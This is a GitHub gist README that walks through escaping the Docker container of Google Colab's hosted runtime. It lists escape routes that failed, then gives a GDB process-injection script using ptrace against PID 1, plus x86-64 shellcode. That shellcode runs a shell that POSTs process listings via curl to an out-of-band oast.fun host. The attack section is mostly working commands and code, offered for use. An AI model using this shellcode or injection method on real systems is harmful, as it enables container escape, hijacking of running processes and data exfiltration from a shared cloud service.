Skip to content

Instantly share code, notes, and snippets.

@win3zz

win3zz/README.md

Last active December 31, 2025 04:39
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save win3zz/0dfb0475936b272a1eed95bfc07173fc to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save win3zz/0dfb0475936b272a1eed95bfc07173fc to your computer and use it in GitHub Desktop.
Download ZIP
Google Colab: Cloud-Based Python Execution
Raw
README.md

Google Colab: Cloud-Based Python Execution

Google Colab (short for Colaboratory) is a powerful, browser-based platform that allows you to write and execute Python code with zero configuration.

At its core, Colab operates through Notebooks, where you can run code cells independently. Gain free access to powerful GPUs (like the T4) and TPUs, making it ideal for training heavy deep learning models. Read more at https://research.google.com/colaboratory/faq.html

How to Access

  1. Web: Visit https://colab.research.google.com/ and sign in with your Google account.
  2. Google Drive: Right-click in any folder, select More, and choose Google Colaboratory to create a new notebook.
  3. GitHub: You can open any .ipynb file directly from GitHub by replacing github.com with colab.research.google.com/github/ in the URL.

Colab provides a full built-in terminal.

Screenshot 2025-12-30 175634

We are inside the Docker, lets escape the container

Failed Testcases:

  1. Kernel module (CAP_SYS_MODULE) - KMSV) enforced
  2. User-Mode Helper: Release Agent - It use the cgroup v2 unified hierarchy
  3. hotplug hijacking - /proc/sys mounted read only
  4. core_pattern hijacking -/proc/sys mounted read only
/content# mount | grep /proc/sys 
proc on /proc/sys type proc (ro,nosuid,nodev,noexec,relatime)

We still have cap_sys_ptrace capability

Goal

Using GDB (apt-get install gdb) to:

  1. Attach to a running process
  2. Read registers (including RIP)
  3. Write bytes into the target’s memory at its RIP
  4. Modify RIP
  5. Resume execution

In other words:

  • inject shellcode
  • overwrite another process’s memory
  • hijack RIP
  • execute arbitrary code inside a running process

Full Example

Attach:

gdb -p 1
Screenshot 2025-12-30 184140

Show registers:

info registers
Screenshot 2025-12-30 184252

Suppose rip = 0x22ce06.

Overwrite first few bytes with NOPs:

Two Practical Ways to Write Bytes

1. Inline raw bytes inside GDB

set {unsigned char[8]} 0x22ce06 = {0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90}
OR
set {char[5]} 0x22ce06 = {0x90, 0x90, 0xcc, 0x48, 0x31}

2. Load from a binary file

restore raw.bin binary 0x22ce06

Where raw.bin is your raw shellcode bytes created earlier.

Screenshot 2025-12-31 100745

OR inject a ret (safe):

set {unsigned char} $rip = 0xC3

Move RIP ahead:

set $rip = $rip + 2

Detach and let process run:

detach
quit

Below is a safe, generic, and minimal GDB script (inject.gdb). It attaches to a PID, prints RIP, writes NOPs at RIP, moves RIP forward by +2 bytes, and detaches.

You can run it with:

gdb -q -p <PID> -x inject.gdb

# ===========================
#  inject.gdb
#  Safe demonstration script
# ===========================

# Print banner
echo [+] Attached via GDB script\n

# Get registers
info registers

# Save RIP in $saved_rip
set $saved_rip = $rip
printf "[+] Current RIP: 0x%lx\n", $saved_rip

# ---------------------------
#  Inject harmless bytes
#  (32 bytes -> NOP sled)
# ---------------------------
printf "[+] Writing 32 bytes of NOPs at RIP\n"
set {unsigned char[32]} $saved_rip = { \
  0x90,0x90,0x90,0x90,  \
  0x90,0x90,0x90,0x90,  \
  0x90,0x90,0x90,0x90,  \
  0x90,0x90,0x90,0x90,  \
  0x90,0x90,0x90,0x90,  \
  0x90,0x90,0x90,0x90,  \
  0x90,0x90,0x90,0x90,  \
  0x90,0x90,0x90,0x90   \
}

# ---------------------------
#  Adjust RIP (like C code)
#  regs.rip += 2
# ---------------------------
set $rip = $saved_rip + 2
printf "[+] RIP updated to: 0x%lx\n", $rip

# ---------------------------
#  Detach and continue
# ---------------------------
printf "[+] Detaching and continuing execution\n"
detach
quit

Generate raw shellcode bytes

STEP 1 — Write assembly (optional as you can download readymade from https://www.exploit-db.com/shellcodes/52395)

Example file: shellcode.s

BITS 64
global _start

_start:
 xor rax,rax
 xor rdx,rdx
 mov rdi,0x68732f6e69622f2f ; //bin/sh
 push rax
 push rdi
 mov rdi,rsp
 push rax
 push word 0x632d ; push "-c"
 mov rsi,rsp
 push rax
 jmp cmd
end:
 push rsi
 push rdi
 mov rsi,rsp
 mov al,59
 syscall
cmd:
 call end
 db "curl -X POST -F 'x=$(ps -ef)' http://jmphydugnnshaaewhwtehwj78044imss0.oast.fun" ; change this with your command

Replace http://jmphydugnnshaaewhwtehwj78044imss0.oast.fun with webhook from https://app.interactsh.com/#/

STEP 2 — Assemble to object file

Install NASM

sudo apt install nasm
nasm -f bin shellcode.s -o raw.bin

To view bytes:

xxd -g1 raw.bin

Alternative (if you wrote ELF)

If you used:

nasm -felf64 shellcode.s -o shellcode.o
ld shellcode.o -o shellcode

Then convert ELF → raw bytes:

objcopy -O binary shellcode raw.bin

STEP 3 — Choose the injection address

Examples:

info registers
x/16i $rip

→ Use $rip or any other address.

Let's assume:

0x7ffff7ff7000

STEP 4 — Write the raw bytes from file

Inside GDB:

restore raw.bin binary 0x7ffff7ff7000

Note: This is the best method for longer byte sequences

You can verify:

x/16bx 0x7ffff7ff7000

STEP 6 — Resume process

continue

Summary Table

Step Command What it does
1 nasm -f bin shellcode.s -o raw.bin Creates raw byte file
2 gdb -p <PID> Attach debugger
3 restore raw.bin binary 0xADDR Inject bytes into memory
4 x/16bx 0xADDR Verify bytes
5 continue Resume execution

Additional Resources

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment